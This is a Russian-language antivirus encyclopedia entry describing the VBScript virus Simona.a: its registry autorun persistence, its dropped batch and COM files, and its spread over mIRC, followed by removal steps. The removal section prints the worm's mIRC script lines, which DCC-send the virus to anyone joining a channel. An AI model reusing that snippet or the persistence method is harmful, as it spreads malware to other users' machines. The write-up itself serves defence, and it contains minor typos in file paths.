Virus.VBS.Simona.a

Материал из Total Malware Info

Перейти к: навигация, поиск

Virus.VBS.Simona.a Вирус, устанавливающий в систему другие вредоносные программы без ведома пользователя. Имеет размер 2 703 байта. Распространяется через клиенты пиринговых IRC-сетей. Написан на Visual Basic Script.

Инсталляция

При запуске вирус копирует свое тело в системный каталог Windows: 

%System%\antivir.vbs

Для автоматического запуска при следующем старте системы вирус добавляет ссылку на свой исполняемый файл в ключ автозапуска системного реестра: 

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"antivbs" = "%System%\antivir.vbs"

Деструктивная активность

Вирус извлекает из своего тела файл: 

%WinDir%\COMMAND\dropper.scr (527 байт, детектируется Антивирусом Каспмерского, как not-virus:BadJoke.DOS.Simona)

Далее вирус создает файл командного интерпретатора dropper.bat: 

%WinDir%\COMMAND\dropper.bat

Который после запуска вызывает команду debug.exe и создает двоичный файл: 

%WinDir%\COMMAN\Dropper.com (141 байт, детектируется Антивирусом Касперского, как not-virus:BadJoke.DOS.Simona)

После чего вирус созадет файл "WinStart.bat", который будет запускать на выполнение файл "dropper.bat": 

%WinDir%\WinStart.bat

Далее вирус создаетв каталоге Windows файл командного интерпретатора: 

%WinDir%\DosStart.bat

Который будет запускать файл Dropper.com. Далее вирус изменяет файл настроек "script.ini", IRC клиента "Mirc", таким образом, что всем пользователям при подключении зараженного компьютера к каналу будет отсылаться тело вируса "%System%\antivir.vbs": 

c:\mirc\script.ini (113 байт, детектируется Антивирусом Касперского как IRC-Worm.VBS.Generic)

Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

  1. Удалить оригинальный файл вируса (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
  2. Удалить параметр в ключе реестра (как работать с реестром?):
    3. [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"antivbs" = "%System%\antivir.vbs"
  3. Удалить файлы:
    4. %System%\antivir.vbs
%WinDir%\COMMAND\dropper.scr
%WinDir%\COMMAND\dropper.bat
%WinDir%\COMMAN\Dropper.com
%WinDir%\WinStart.bat
%WinDir%\DosStart.bat
  4. В файле настроек IRC-клиента "Mirc" script.ini удалить строку:
    5. [script]
n0=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }
n1=/dcc send $nick C:\WINDOWS\system32\antivir.vbs
}
Источник — «http://www.totalmalwareinfo.com/rus/Virus.VBS.Simona.a»
Язык
Видеокурс
Computer and Internet Security Video Tutorials
© 2011 ООО «Лаборатория дизайн и тест». Все права защищены.